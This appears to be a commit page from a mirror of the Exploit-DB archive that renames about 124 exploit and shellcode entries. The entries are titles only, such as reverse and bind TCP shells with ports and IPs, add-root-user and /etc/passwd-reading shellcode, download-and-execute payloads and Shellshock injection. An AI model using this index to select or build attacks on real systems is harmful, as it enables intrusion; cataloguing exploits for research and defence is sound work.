bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-25

Browse source 
124 changes to exploits/shellcodes

Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)
Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)

Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC)
Samsung DVR SHR2040 - HTTPd Remote Denial of Service Denial of Service (PoC)

Novell ZenWorks 10/11 - TFTPD Remote Code Execution
Novell ZENworks 10/11 - TFTPD Remote Code Execution

Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi
Apache 1.1 / NCSA HTTPd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi

WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service
WhitSoft SlimServe HTTPd 1.1 - 'GET_ Denial of Service

GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service
GoAhead Web Server 2.1 (Windows) - Denial of Service

Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service
Anti-Web HTTPd 2.2 Script - Engine File Opening Denial of Service

Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow
Rosiello Security Sphiro HTTPd 0.1B - Remote Heap Buffer Overflow

D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service
D-Link DWL-G700AP 2.00/2.01 - HTTPd Denial of Service

Lorex LH300 Series - ActiveX Buffer Overflow (PoC)

Debut Embedded httpd 1.20 - Denial of Service
Debut Embedded HTTPd 1.20 - Denial of Service

Xorg 1.4 < 1.11.2 - File Permission Change
X.Org xorg 1.4 < 1.11.2 - File Permission Change

Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit)
Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)

ICU library 52 < 54 - Multiple Vulnerabilities

rooter VDSL Device - Goahead WebServer Disclosure
FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure

Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal
Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal

Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow
Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow

Debian 2.1 - httpd
Debian 2.1 - HTTPd

Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing
Apache 0.8.x/1.0.x / NCSA HTTPd 1.x - 'test-cgi' Directory Listing

Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String
Inso DynaWeb HTTPd 3.1/4.0.2/4.1 - Format String

W3C CERN httpd 3.0 Proxy - Cross-Site Scripting
W3C CERN HTTPd 3.0 Proxy - Cross-Site Scripting

ATP httpd 0.4 - Single Byte Buffer Overflow
ATP HTTPd 0.4 - Single Byte Buffer Overflow

AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow
AN HTTPD 1.38/1.39/1.40/1.41 - 'SOCKS4' Buffer Overflow
Light HTTPd 0.1 - GET Buffer Overflow (1)
Light HTTPd 0.1 - GET Buffer Overflow (2)
Light HTTPd 0.1 - 'GET' Buffer Overflow (1)
Light HTTPd 0.1 - 'GET' Buffer Overflow (2)

Light HTTPD 0.1 (Windows) - Remote Buffer Overflow
Light HTTPd 0.1 (Windows) - Remote Buffer Overflow

Ultra Mini HTTPD 1.21 - Remote Stack Buffer Overflow
Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow

Ultra Mini HTTPD - Remote Stack Buffer Overflow (Metasploit)
Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)

BusyBox 1.01 - HTTPD Directory Traversal
BusyBox 1.01 - HTTPd Directory Traversal

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2)
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock'  Remote Command Injection
Apache mod_cgi - 'Shellshock'  Remote Command Injection
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection
Apache mod_cgi - 'Shellshock' Remote Command Injection

IPFire - 'Shellshock'  Bash Environment Variable Command Injection (Metasploit)
IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)

AsusWRT Router < 3.0.0.4.380.7743 - Unauthenticated LAN Remote Code Execution

GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit)
GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)

GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution
GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution

NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)

Getsimple 2.01 - Local File Inclusion
Getsimple CMS 2.01 - Local File Inclusion

Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)
Novell ZENworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)

ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload
ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload
ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution
ManageEngine EventLog Analyzer - Multiple Vulnerabilities
ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution
ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)

Bash CGI - 'Shellshock' Remote Command Injection  (Metasploit)
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)

Getsimple 3.0 - 'set' Local File Inclusion
Getsimple CMS 3.0 - 'set' Local File Inclusion

ZENworks Configuration Management 11.3.1 - Remote Code Execution
Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution

Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)
Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)

Getsimple - 'path' Local File Inclusion
Getsimple CMS 3.1.2 - 'path' Local File Inclusion

Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)
SysAid Help Desk Software 14.4.32 b25 - SQL Injection (Metasploit)

ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection
ManageEngine Password Manager Pro / ManageEngine IT360 - SQL Injection
BMC Track-It! 11.4 - Multiple Vulnerabilities
Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities
SysAid Help Desk 14.4 - Multiple Vulnerabilities
Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities
GetSimple CMS 3.3.1 - Cross-Site Scripting
CMS Made Simple 1.11.9 - Multiple Vulnerabilities
ManageEngine Desktop Central - Create Administrator
ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)
ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities
ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities

Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - Authenticated Arbitrary File Upload

Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)
FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)
FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)
FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes)
FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)
Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)
Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)
Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)

Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)
Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)

Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (33 bytes)

NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)

Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)

Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)
Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)
Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)
UnixWare - execve(/bin/sh) Shellcode (95 bytes)
Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)
Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)
UnixWare - execve(/bin/sh) Shellcode (95 bytes)

Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode
Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode

Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)

Windows/x86 (XP SP3) - ShellExecuteA Shellcode
Windows/x86 (XP SP3) - ShellExecuteA() Shellcode

Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)
Windows  (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)
Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)
Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)
Linux/x86 - ip6tables -F Shellcode (47 bytes)
Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)
Linux/i686 - pacman -R <package> Shellcode (59 bytes)
Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)
Linux/x86 - ip6tables -F Shellcode (47 bytes)
Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)
Linux/i686 - pacman -R <package> Shellcode (59 bytes)

Windows/x86 - JITed Stage-0 Shellcode

Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes)
Windows/x86 (XP SP2) - WinExec(write.exe) + ExitProcess Shellcode (16 bytes)
Windows/x86 - MessageBox Shellcode (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode
Windows/x86 - MessageBox Shellcode (Generator) (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode
Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)
Linux/x64 - reboot(POWER_OFF) Shellcode (19 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (30 bytes)

Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)

Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)
Windows/x64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)

Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes)
Windows/x64 (7) - cmd.exe Shellcode (61 bytes)

Windows - MessageBoxA Shellcode (238 bytes)
Windows - MessageBoxA() Shellcode (238 bytes)

Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)
Linux/x64 - Disable ASLR Security Shellcode (143 bytes)
Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)
Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)
Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes)
Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)
Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator)
Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)
Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)

Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)

Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)
Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)

Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)
Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes)
OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)
ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)
OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)
ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit)

Windows/x86 - Eggsearch Shellcode (33 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)
OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)
OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)

Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)

OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode
OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode

Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (52 bytes)

Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)
Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)

Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)
Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode
Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode

Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)

Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)
Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)
Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)

Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)

Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)
Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)

Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)
Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)

Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)
Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)

Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)
Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)
Linux/x86-64 - execve() Encoded Shellcode (57 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode
Linux/x64 - execve() Encoded Shellcode (57 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator)
Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode
Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)
Windows/x86 - user32!MessageBox(Hello World!) + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator)
Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)
OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)
OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (34 bytes)
Linux/x86-64 - execve() Shellcode (22 bytes)
Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)
Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)
Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)
Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)
Linux/x64 - execve() Shellcode (22 bytes)
Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)
Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes)
Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)
Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)
Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)
Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)
Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)
Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)
Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)

Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)
Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)
Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)
Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (26 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1)
Linux/x64 - execve(/bin/bash) Shellcode (33 bytes)
Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)
Linux/x64 - Read /etc/passwd Shellcode (65 bytes)
Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)
Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)

Linux/x86-64 - Bind TCP Shell Shellcode (Generator)
Linux/x64 - Bind TCP Shell Shellcode (Generator)
Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)
Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)
Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)

Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)
Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)
Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)
BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)
BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)
Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)
Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)
Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)

Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)

Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)
Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)

Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)
Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)

Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)
Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)

Windows/x86 - MessageBoxA Shellcode (242 bytes)
Windows/x86 - MessageBoxA() Shellcode (242 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)
Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)
Linux/x64 - Read /etc/passwd Shellcode (82 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)
Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)
Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)
